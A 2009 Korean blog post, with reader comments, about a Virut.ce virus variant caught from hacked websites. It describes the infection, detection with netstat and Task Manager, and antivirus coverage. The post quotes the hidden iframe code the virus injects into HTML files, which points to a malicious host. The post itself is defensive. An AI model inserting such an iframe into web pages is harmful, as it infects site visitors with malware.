태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.
 

 
페이지 구독





과거 기사

Locations of visitors to this page

악성 코드로 번지는 Virut 변종 바이러스

IT네트워크 | 2009.04.22 13:20 | Posted by Namu(南無)

Virut 바이러스라고, 윈도우의 기본 프로그램 중 하나인 Winlogon.exe에 서식하여 실행 파일인 *.exe와 화면 보호기인 *.scr의 로컬 드라이브를 감염시키는 강력한 바이러스가 있습니다. 감염 후 특정 IRC 서버와 웹 호스트에 접속하는 특성이 있습니다. 그런데, 이 바이러스의 변종이 등장했습니다. 그것도 저번에 언급했던 여러 인터넷 홈페이지의 해킹으로 인한 악성 코드 실행이 그 원인입니다.

2009/04/11 - 악성 코드가 포함된 것으로 보고되는 알라딘

처음 알라딘 TTB2에 대해 구글 안전 브라우징이 경고한 것을 보고 이 문제를 확인했습니다.

2009/04/11 - 악성 코드가 넘칩니다, 웹 서핑 조심하세요.

이 악성 코드는 알라딘 뿐 아니라, 여러 사이트에서 발견되어 퍼져나갔습니다. 이 악성 코드는 iframe으로 해당 페이지에 삽입되어 보안 구멍을 이용해 웹 페이지를 여는 사용자의 컴퓨터를 감염시키는 문제가 있었습니다.

그리고 제 컴퓨터도 이 악성 코드에 의해 바이러스에 감염되었습니다.

바이러스의 특징

이 바이러스의 특징은 꽤 단순합니다. 우선 Virut 바이러스처럼 모든 실행 파일과 화면 보호기를 감염시킵니다. 그리고 *.htm, *.html 등 HTML 파일에서 끝에 iframe src="http://jL.chura.pl/rc/" style="display:none" 코드를 넣습니다. 이것은 보이지 않는 iframe 영역을 넣어서 이 컴퓨터가 웹서버일 경우 다른 컴퓨터가 접근했을 때 마찬가지로 감염될 수 있도록 하는 역할을 합니다. 파일을 열어 수정하더라도 저장되는 순간 감지하여 다시 코드를 넣기 때문에 바이러스를 제거하기 전까지는 모든 HTML 파일에 이 코드가 강제로 들어가게 됩니다.

또한 Winlogon.exe이 특정 웹 서버와 접속하여 통신을 시도합니다. 확인 방법은 작업 관리자를 실행하여 winlogon.exe의 PID(Process ID)를 확인합니다. PID가 표시되지 않을 경우 보기>열 선택에서 PID를 체크해주시면 됩니다.

다음 시작 버튼을 눌러 실행 메뉴를 선택하거나 윈도우 키+R을 눌러 실행 창을 띄워 cmd를 눌러 명령어 모드에서 netstat -o -a를 쳐서 winlogon.exe가 특정 호스트와 접속을 시도하는지 확인하면 됩니다.

제 경우에도 이와 같은 절차를 거쳐 확인해 보니, 특정 호스트와 winlogon.exe가 접속되어 있더군요. 접속되어 있는 IP는 KINX가 보유한 IP 대역대였습니다.

V3는 잡지 못 하는 Virut 변종

문제는 이 바이러스가 국내에서도 별로 알려져 있지 않고 V3로도 잡을 수 없다는 것이었습니다. V3 2007 플래티넘을 사용 중이었으나, 전혀 인식하지 못 했던 것입니다. 그래서 해외 포럼에서 정보를 찾아 보았습니다. Avast에서도 이 바이러스는 잡지 못 하고 유일하게 카퍼스키만이 잡을 수 있다는 사실을 확인했습니다.

카스퍼스키는 90일 무료 체험판을 다운로드 받아 사용할 수 있습니다.

카스퍼스키 다운로드

여러 바이러스 백신 중에서 카스퍼스키만이 Win32:Virut.ce 바이러스를 잡을 수 있는 것으로 확인되었습니다.

안철수 연구소에 바이러스 신고

우선 안철수 연구소에 바이러스 보고를 했습니다. 제가 사용 중인 바이러스 보호 프로그램이 V3 2007 플래티넘이었고, 보고되지 않았다고 판단되었기 때문입니다.

아바스트 포럼에서도 아직 아바스트가 못 잡는다는 이야기가 있더군요. 확인 법은 있었지만 이미 실행 파일 등에 감염된 것까지 처리하는 방법은 없었습니다. 안철수 연구소에서도 처음 접수된 듯 하더군요. 아직 안철수 연구소에서도 백신 데이터 베이스를 갱신하지 않은 상태입니다.

한숨은 돌렸지만…

겨우 백신 프로그램을 돌려서 쭉 잡아보았더니 작은 파일 크기의 *.exe와 *.scr은 모두 감염되어 있었습니다. 이 바이러스의 특징 중 하나가 5MB 이하의 작은 파일에 대해서만 감염시킨다는 점이더군요.

카스퍼스키 체험판을 깔아 우선 Virut.ce 바이러스는 피했지만, 여러 경로를 조심하는데도 불구하고 악성 코드를 통해 바이러스에 당하는 건 처음인 듯 해서 참으로 충격적입니다. 조심한다 조심한다 해도 이렇게 당하다니.

앞으로는 구글 안전브라우징이 경고하는 사이트는 피해야겠습니다. 블로깅 등을 위해 들락날락하다 보니 언제 감염되었는지도 몰랐으니 말입니다.

※ V3에서도 오후 1시 기준으로 정보가 업데이트 되어서 치료 가능하게 되었습니다. Win-Trojan/Exploit-PDF으로 2009.04.22.02 업데이트부터 적용됩니다.

저작자 표시 비영리 변경 금지
신고

댓글을 달아 주세요!!

  1. Favicon of http://demun.tistory.com demun 2009.04.22 14:08 신고  댓글주소  수정/삭제  댓글쓰기

    악성코드문제입니다.
    백신마다 다르더라구요. 아바스트도 못잡는다고 나오듯, 전 노드32쓰는데 간혹 제가 업로드한 파일때문에 악성코드에 걸렸다고 하시는분이 계시더라구요...
    전 괜찮은데...
    좋은 정보 잘 봤습니다.

    • Favicon of http://studioxga.net Namu(南無) 2009.04.22 14:12 신고  댓글주소  수정/삭제

      현재 Virut.ce는 카스퍼스키와 시맨텍만 잡을 수 있는 거 같고 Virut.fe도 나오고 있습니다. 제작자가 꾸준히 변종 제작 중이고 감염된 후 웹 서버가 숙주가 되는 방식이라 전파속도도 빠르더군요.

    • Favicon of http://demun.tistory.com demun 2009.04.22 14:19 신고  댓글주소  수정/삭제

      역시 아무리 좋은 백신이라해도 계속 업데이트되는 악성코드를 따라가는 격이군요.

    • Favicon of http://studioxga.net Namu(南無) 2009.04.22 14:32 신고  댓글주소  수정/삭제

      아무리 좋은 백신이라도 보안 취약점을 뚫고 들어오는 걸 모두 막진 못 합니다. 이번 Virut.ce (안랩 진단명 Exploit-PDF)의 경우 웹 사이트에 iframe으로 특정 스크립트를 호출하고, 그 다음 PDF을 로드하는 보안 취약점을 통해 감염시키는 악랄한 방식입니다.

      어쨌든 새벽에 신고한 게 낮에 처리되어 12시간 이내에 처리된 점은 다행입니다.

  2. kn 2009.04.22 16:24 신고  댓글주소  수정/삭제  댓글쓰기

    악날하기로는 컨플리커 웜이 끔직하지요
    Conficker 이놈 걸리면 게임 끝입니다. 보안업체에 접속이 안되니 업데이트및 치료파일을 받을수가 없어요. 변종도 끊임없이 나오고요

  3. Favicon of http://daegul.tistory.com 데굴대굴 2009.04.22 21:42 신고  댓글주소  수정/삭제  댓글쓰기

    참고...
    netstat 명령을 내리실 때,

    netstat -nao | findstr PID

    로 하시면 조금 더 편하게 찾으실 수 있습니다. PID는 첫번째 그림에 밑줄 그어진 부분을 참고하시면 됩니다. 위의 예제를 따라한다면,

    netstat -nao | findstr 1020

    이 됩니다.

  4. Favicon of http://kofchi.tistory.com kofchi 2009.04.22 22:52 신고  댓글주소  수정/삭제  댓글쓰기

    바이러스나 악성코드, 스파이웨어 등 요즘 변종되어 컴퓨터로 침입해 난동부린다는 게 여러모로 검사를 해야 할 것 같습니다. 잘 보고 갑니다.

  5. master 2009.08.05 16:20 신고  댓글주소  수정/삭제  댓글쓰기

    그 악성코드가 삽입된 홈페이지를 가지고 있습니다..ㅜㅜ

    그 악성코드를 아무리 제거를 해 보아도 2일에 한번씩 다시 삽입되고

    다시 삽입되고 있습니다. 홈페이지 서버는 호스팅업체에 맡겨두었으니..

    호스팅업체에 문의을 해 보았지만.. 웹 취약점 보완수정하는 방법뿐이라는

    말 뿐이었고.. 그래서 웹취약점 보완을 하였습니다.

    하지만.. 악성코드 문제는 계속 되고 있습니다..

    그래서 다시 문의를 했더니/./ 홈페이지 리뉴얼을 하라네요-_-.........

    악성코드도 같은 거인거보니.. 제거를 해도 소용이 없는가 봅니다...

    어떻게 해야할까요??????ㅜㅜ

  6. 열라면 2014.03.08 07:40 신고  댓글주소  수정/삭제  댓글쓰기

    웹서버가 바이러스에 감염되거나 공격을 당하고도 모르면, 바이러스를 배포하는 웹사이트가 되거나, 스팸메일을 발송하는 스팸서버가 되어버리지요. 실시간 감시기능이 있는 [리눅스 백신 이스캔] 을 사용하면, 감염된 파일을 찾아주기도 하지만, 파일이 실행되거나, 수정될 때에도 검사하여 저장되기 전에 차단하기 때문에 큰 도움이 될 수 있을 듯 합니다.